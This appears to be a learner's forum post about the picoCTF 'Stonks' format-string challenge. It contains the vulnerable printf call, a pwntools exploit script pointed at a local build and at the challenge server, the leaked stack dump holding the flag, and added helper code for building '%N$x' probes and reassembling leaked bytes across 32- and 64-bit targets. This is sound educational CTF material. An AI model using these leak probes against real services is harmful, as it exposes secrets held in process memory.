9 Mar
String format exploit works differently on my machine than on the remote target
I'm learning binary exploitation with the picoCTF challenges. I solved Stonks, but I'm trying to learn more about how the stack works.
What I did was the following:
- checked out the source, here is the vulnerable snippet
int buy_stonks(Portfolio *p) {
    char api_buf[FLAG_BUFFER];              // flag is read into this stack buffer
    FILE *f = fopen("api", "r");
    fgets(api_buf, FLAG_BUFFER, f);
    // TODO: Figure out how to read token from file, for now just ask
    char *user_buf = malloc(300 + 1);
    scanf("%300s", user_buf);
    printf(user_buf);                       // format string bug: user input is the format argument
}
- created the api file:
echo picoCTF{s@mpl3_k3y} > api
- created the exploit
#!/usr/bin/env python3
from pwn import *            # also brings os, p32, process and remote into scope

os.system("make vuln")       # rebuild the local binary
io = process("./vuln")
# io = remote("mercury.picoctf.net", 59616)

# 14 x "%8x": each conversion prints one vararg slot as an 8-character hex field
payload = b"%8x" * 14
print(payload.decode("utf-8"))
io.sendline(payload)

# split the reply into 8-character fields and show each word's little-endian bytes
out = io.recvline().decode()
for i in range(0, len(out[:-1]), 8):
    h = out[i:i + 8]
    print(f"{h}: {p32(int(h, 16))}")
If I run it on my machine the output is:
%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x%8x
1: b'\x01\x00\x00\x00'
1: b'\x01\x00\x00\x00'
f7d14887: b'\x87H\xd1\xf7'
19: b'\x19\x00\x00\x00'
5555b540: b'@\xb5UU'
ffffd790: b'\x90\xd7\xff\xff'
555592a0: b'\xa0\x92UU'
0: b'\x00\x00\x00\x00'
5555a2d0: b'\xd0\xa2UU'
5555b520: b' \xb5UU'
5555b540: b'@\xb5UU'
6f636970: b'pico'
706d4073: b's@mp'
a7d7933: b'3y}\n'
The last 3 lines output the partial flag: pico....s@mp....3y}\n
The same exploit (just uncommenting io = remote("mercury.picoctf.net", 59616))
prints the flag from the target:
...
6f636970: b'pico'
7b465443: b'CTF{'
...
ffcf007d: b'}\x00\xcf\xff'
I tried searching for a Linux security flag that might be enabled on my machine, but I'm still new (and eager to learn!).
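Added example (not part of the question above, and not picoCTF's code): a small helper for the kind of stack dump the question performs, written to make the target's word size an explicit parameter. It assumes an x86 target, where every vararg slot is 4 bytes, or an x86-64 one, where the SysV ABI hands printf 8-byte slots and a plain "%x" prints only the low 4 bytes of each slot, so every other 4-byte chunk of a string on the stack goes unseen. The local dump in the question has exactly that shape: slots 12, 13 and 14 show "pico", "s@mp" and "3y}\n" while "CTF{" and "l3_k" are missing, which is what "%x" yields against a 64-bit build; a 32-bit build prints the string contiguously, as the remote output does. The sample replies below are constructed from the picoCTF{s@mpl3_k3y} key the question wrote to the api file (LOCAL_REPLY re-renders the 14 words of the question's local run with the "%8x" space padding restored); the "%N$x" direct-parameter-access probe is standard printf syntax.

```python
"""Format-string stack dump helpers: build a direct-parameter-access probe and
reassemble the leaked bytes.  Added example for this page, not the question's
exploit and not picoCTF's code."""

# Per-ABI slot size: how many bytes of stack one conversion consumes when
# printf walks its (non-existent) varargs.  On i386 every argument is a
# 4-byte stack word; on x86-64 the SysV ABI pulls 8-byte slots (after five
# registers), so "%x" prints only the low 4 bytes of each slot and silently
# skips the rest.  "%lx" prints the whole 8-byte slot.
ABI = {
    "i386":   {"slot": 4, "conv": "08x"},     # %N$08x   -> 8 hex digits
    "x86_64": {"slot": 8, "conv": "016lx"},   # %N$016lx -> 16 hex digits
}


def build_probe(first, last, abi="i386"):
    """Probe that dumps vararg slots first..last (1-based, inclusive).
    Direct parameter access (%N$...) pins each conversion to one slot, and
    the zero-padded fixed width makes the reply splittable without guessing."""
    conv = ABI[abi]["conv"]
    return "".join(f"%{i}${conv}" for i in range(first, last + 1)).encode()


def split_reply(reply, hex_width):
    """Cut a reply made of fixed-width hex fields into integers.
    Tolerates the space padding of %8x as well as the zeros of %08x."""
    reply = reply.rstrip("\n")
    values = []
    for i in range(0, len(reply), hex_width):
        field = reply[i:i + hex_width].strip()
        if not field:
            break
        values.append(int(field, 16))
    return values


def leaked_bytes(reply, printed, slot):
    """Reassemble the bytes the dump actually revealed, little-endian.
    `printed` is how many low bytes each conversion showed (4 for %x, 8 for
    %lx); `slot` is how many bytes it consumed (the ABI slot size).  Bytes
    that were consumed but never printed are marked "?" so gaps stay visible."""
    blob = bytearray()
    for value in split_reply(reply, printed * 2):
        blob += value.to_bytes(printed, "little")
        blob += b"?" * (slot - printed)
    return bytes(blob)


def find_flag(blob, slot, prefix=b"pico", end=b"}"):
    """Locate the flag in reassembled bytes.  Returns (1-based index of the
    slot holding the prefix, flag text) or None.  A "?" in the text marks
    bytes the dump skipped."""
    start = blob.find(prefix)
    if start < 0:
        return None
    stop = blob.find(end, start)
    flag = blob[start:stop + 1] if stop >= 0 else blob[start:]
    return start // slot + 1, flag.decode("ascii", errors="replace")


# --- Sample replies (constructed) -------------------------------------------
# The 14 words printed by the question's local run, re-rendered as "%8x"
# output (the space padding was lost when the post was pasted).
LOCAL_WORDS = [0x1, 0x1, 0xf7d14887, 0x19, 0x5555b540, 0xffffd790, 0x555592a0,
               0x0, 0x5555a2d0, 0x5555b520, 0x5555b540,
               0x6f636970, 0x706d4073, 0x0a7d7933]
LOCAL_REPLY = "".join(f"{w:8x}" for w in LOCAL_WORDS) + "\n"

FLAG_BYTES = b"picoCTF{s@mpl3_k3y}\n"   # the sample key from the question's api file

# Hypothetical 32-bit build: two junk words, then the key in 4-byte slots,
# dumped with %N$08x.
REMOTE32_WORDS = [0x1, 0xffcf0000] + [
    int.from_bytes(FLAG_BYTES[i:i + 4], "little") for i in range(0, len(FLAG_BYTES), 4)]
REMOTE32_REPLY = "".join(f"{w:08x}" for w in REMOTE32_WORDS) + "\n"

# Same key on a 64-bit build, dumped with %N$016lx so whole 8-byte slots show.
FLAG64 = FLAG_BYTES + b"\0" * 4
LOCAL64_REPLY = "".join(
    f"{int.from_bytes(FLAG64[i:i + 8], 'little'):016x}" for i in range(0, len(FLAG64), 8)) + "\n"


def demo():
    """Parse each reply under the right and the wrong slot-size assumption."""
    return {
        # Question's local run read as a 32-bit target: the flag looks mangled.
        "local_as_4byte_slots": find_flag(leaked_bytes(LOCAL_REPLY, 4, 4), 4),
        # Same reply read as a 64-bit target: the gaps are the missing chunks.
        "local_as_8byte_slots": find_flag(leaked_bytes(LOCAL_REPLY, 4, 8), 8),
        # 32-bit target, %x prints whole slots: contiguous flag.
        "remote32":             find_flag(leaked_bytes(REMOTE32_REPLY, 4, 4), 4),
        # 64-bit target dumped with %lx: contiguous flag.
        "local64_with_lx":      find_flag(leaked_bytes(LOCAL64_REPLY, 8, 8), 8),
    }


if __name__ == "__main__":
    for name, hit in demo().items():
        print(f"{name:22s} -> {hit}")
```

Against a live target, send build_probe(1, 40, abi) instead of a fixed run of "%8x", read the reply and pass it to leaked_bytes with printed = 4 for an "%x"-style probe (8 for "%lx") and slot set to the target's ABI slot size; if the reassembled string shows "?" gaps every four bytes, the binary is 64-bit and the probe should use the x86_64 conversion.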